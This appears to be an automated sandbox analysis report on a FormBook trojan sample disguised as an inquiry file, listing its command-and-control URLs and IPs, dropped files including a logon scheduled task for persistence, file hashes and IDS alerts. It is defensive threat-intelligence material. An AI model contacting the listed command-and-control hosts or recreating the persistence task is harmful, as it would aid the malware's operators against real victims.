            http://www.globaltrend.xyz/srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.tp-consulting.net/3ooi/0%Avira URL Cloudsafe
            http://www.globaltrend.xyz0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/0%Avira URL Cloudsafe
            http://www.alphacentura.com/mnr7/0%Avira URL Cloudsafe
            https://http.gn301.com:12345/?u=0%Avira URL Cloudsafe
            http://www.dtalengineering.com/la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L50%Avira URL Cloudsafe
            https://ventraip.com.au/favicon.ico0%Avira URL Cloudsafe
            http://www.ffi07s.xyz/y7ar/0%Avira URL Cloudsafe
            http://www.dospole.top/soqq/0%Avira URL Cloudsafe
            http://www.viertage.work/br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.9988566a4.shop0%Avira URL Cloudsafe
            http://www.alphacentura.com/mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg==0%Avira URL Cloudsafe
            http://www.9988566a4.shop/roex/0%Avira URL Cloudsafe
            http://www.dtalengineering.com/la5g/0%Avira URL Cloudsafe
            http://www.dospole.top/soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA==0%Avira URL Cloudsafe
            http://www.tp-consulting.net/3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.j51a.xyz/y0md/0%Avira URL Cloudsafe
            http://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw==0%Avira URL Cloudsafe
            https://badges.ausowned.com.au/076340%Avira URL Cloudsafe
            http://www.9988566a4.shop/roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ==0%Avira URL Cloudsafe
            http://www.globaltrend.xyz/srh8/0%Avira URL Cloudsafe
            https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.dynamologistics.net
            35.212.86.52
            truetrue
              unknown
              www.viertage.work
              185.181.104.242
              truetrue
                unknown
                www.tp-consulting.net
                5.252.229.221
                truetrue
                  unknown
                  weien.cdn.youziyuncdn.com
                  134.122.138.60
                  truetrue
                    unknown
                    www.dtalengineering.com
                    103.42.108.46
                    truetrue
                      unknown
                      www.ffi07s.xyz
                      188.114.96.3
                      truetrue
                        unknown
                        wegamovies.online
                        84.32.84.32
                        truetrue
                          unknown
                          www.globaltrend.xyz
                          188.114.97.3
                          truetrue
                            unknown
                            huayang.302.gn301.xyz
                            154.12.34.252
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1470000
                                                      Start date and time:2024-07-09 12:06:24 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:24
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:3
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Inquiry PR#27957.bat.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@25/16@17/12
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 110
                                                      • Number of non-executed functions: 327
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target TsdBVAGjsKVoi.exe, PID 6336 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Inquiry PR#27957.bat.exe
Time | Type | Description
06:07:14 | API Interceptor | 2x Sleep call for process: Inquiry PR#27957.bat.exe modified
06:07:16 | API Interceptor | 38x Sleep call for process: powershell.exe modified
06:07:20 | API Interceptor | 2x Sleep call for process: fuqwoDzun.exe modified
06:08:34 | API Interceptor | 10471706x Sleep call for process: sfc.exe modified
11:07:19 | Task Scheduler | Run new task: fuqwoDzun path: C:\Users\user\AppData\Roaming\fuqwoDzun.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      Universalmiddel169.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.181.104.242
                                                      CLOUDFLARENETUShttps://0i0000923330.cc/2dr/index.htmlGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      https://pcpocu.shop/Get hashmaliciousUnknownBrowse
                                                      • 104.16.198.133
                                                      Autoliv Purchase Order #1727784.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      https://cloudflare-ipfs.com/ipfs/QmP2SgKUomqtvY4PmVtfbbHb2qdpL8VK8mAkoBJyub4nU4/index2sal2606.html#info@daiichi-sankyo.ptGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.64.14
                                                      1050-C10 8000 - HV501_03.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      EGS-EP2409 #U5907#U4ef6#U7533#U8bf7#U5355 (HATCH COVER).exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      Selvretfrdig.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      https://l39.n8xgn.com/l39/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      • 104.17.25.14
                                                      3e#U0441.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.97.3
                                                      xE5gan.xlsGet hashmaliciousRemcosBrowse
                                                      • 172.66.43.27
                                                      LHPLInquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      bPYR660y5o.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 185.135.90.183
                                                      A6yWw0hs74.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      p2l1D8TV94.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Wwhv0rbIoV.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      YP61700IK.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Begraensningen.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Halkbank_Ekstre_20230918_44390_097542.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 185.135.90.183
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.379677338874509
                                                      Encrypted:false
                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:tLHxvIIwLgZ2KRHWLOug8s
                                                      MD5:AAC9B2CC385B2595E11AAF60C4652279
                                                      SHA1:5F14BE9EC829371BFAC9DDBF97BF156C13E03341
                                                      SHA-256:0C17939EA24BBFE7F727AFB0FABC5BAFC8F2A8A5218BC9B2A7580A54B510EC84
                                                      SHA-512:3BC9F81C7C9FD417B7F486550EBBE95CF4BA5408E013AB11FA54400F49DB8ACDAD5EE28C95278DACF62E6FDB30071D193EED741616C91E48F9A2ADC92EAAB257
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\sfc.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1221538113908904
                                                      Encrypted:false
                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1568
                                                      Entropy (8bit):5.086063760426755
                                                      Encrypted:false
                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewm+uv:HeLwYrFdOFzOz6dKrsuqn+0
                                                      MD5:34A7E634A78FEDC4DBED6DB889282F9F
                                                      SHA1:BE793491A37AF112B9A33D1A52BA7982FDDFB8AE
                                                      SHA-256:1FCB5B692FF418D3936B713B3C1A5083D653E172BA3E94F62962570C806313E1
                                                      SHA-512:8834FF5C934FAE32B4F0707C7DF16FDBE3EC489E5B089085140E6545CAD744714CB9A20F2ED0C3F2FE316C7BA3E3D3F14150DE3F4C69B9F51F7BB6FF4BF28266
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                      Process:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1568
                                                      Entropy (8bit):5.086063760426755
                                                      Encrypted:false
                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewm+uv:HeLwYrFdOFzOz6dKrsuqn+0
                                                      MD5:34A7E634A78FEDC4DBED6DB889282F9F
                                                      SHA1:BE793491A37AF112B9A33D1A52BA7982FDDFB8AE
                                                      SHA-256:1FCB5B692FF418D3936B713B3C1A5083D653E172BA3E94F62962570C806313E1
                                                      SHA-512:8834FF5C934FAE32B4F0707C7DF16FDBE3EC489E5B089085140E6545CAD744714CB9A20F2ED0C3F2FE316C7BA3E3D3F14150DE3F4C69B9F51F7BB6FF4BF28266
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):879624
                                                      Entropy (8bit):7.7276775085868445
                                                      Encrypted:false
                                                      SSDEEP:12288:Kug4N2iNPkQetDqi68Qtx/QtWXF/WF9XZNQ64xx0uCffNDOgxSlFutDG54BsUYlE:dN11668MGZZG64B25/Sl8tDCtUayI7k
                                                      MD5:9972524538C9F43A23AD683DA0A1A97A
                                                      SHA1:4FE56974A8A9DB66FB9026B0C817A84111CB834B
                                                      SHA-256:499EF83EEE9CEF5EFA3DFC22FC88A6962289722A65626EC1630721E930784287
                                                      SHA-512:F345D5B30A53085393F4D7D6D626D2D20E2C410896AB906C039C3D745ED967480C2B4A03E4EC46D1A2F775E940D1E1161D4A07075ABED84DB301536AF12C973E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.7276775085868445
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:Inquiry PR#27957.bat.exe
                                                      File size:879'624 bytes
                                                      MD5:9972524538c9f43a23ad683da0a1a97a
                                                      SHA1:4fe56974a8a9db66fb9026b0c817a84111cb834b
                                                      SHA256:499ef83eee9cef5efa3dfc22fc88a6962289722a65626ec1630721e930784287
                                                      SHA512:f345d5b30a53085393f4d7d6d626d2d20e2c410896ab906c039c3d745ed967480c2b4a03e4ec46d1a2f775e940d1e1161d4a07075abed84db301536af12c973e
                                                      SSDEEP:12288:Kug4N2iNPkQetDqi68Qtx/QtWXF/WF9XZNQ64xx0uCffNDOgxSlFutDG54BsUYlE:dN11668MGZZG64B25/Sl8tDCtUayI7k
                                                      TLSH:C215E060F148BDD3C55644FBDC61F94223BABB56562ED6956CF2B4CA10F27C22222E0F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..f.................,...........K... ...`....@.. ....................................@................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x4d4b2e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x668CD05B [Tue Jul 9 05:53:31 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Signature Valid:false
                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                      Subject Chain
                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                      Version:3
                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                      Serial:7C1118CBBADC95DA3752C46E47A27438
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd4ad4 | 0x57 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd6000 | 0x54c | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd3600 | 0x3608 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd8000 | 0xc | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      .text | 0x2000 | 0xd2b34 | 0xd2c00 | 6548e693a19a827b95b04bc342529d94 | False | 0.8483339357206405 | data | 7.729262994799031 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc | 0xd6000 | 0x54c | 0x600 | bcd9d69e68ed39b0c49cb550cc20ab77 | False | 0.4192708333333333 | data | 4.564993780646928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc | 0xd8000 | 0xc | 0x200 | c935d72cc54b86ab8abc93a5b89b1f53 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                      RT_VERSION | 0xd60a0 | 0x2f8 | data | | | 0.45921052631578946
                                                      RT_MANIFEST | 0xd6398 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                                      DLL | Import
                                                      mscoree.dll | _CorExeMain
                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                      07/09/24-12:11:31.166546 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49767 | 80 | 192.168.2.9 | 94.130.217.114
                                                      07/09/24-12:09:32.817975 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.9 | 188.114.97.3
                                                      07/09/24-12:08:47.740793 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.9 | 188.114.96.3
                                                      07/09/24-12:10:48.702397 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49755 | 80 | 192.168.2.9 | 142.250.185.147
                                                      07/09/24-12:11:16.679042 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49763 | 80 | 192.168.2.9 | 38.145.202.186
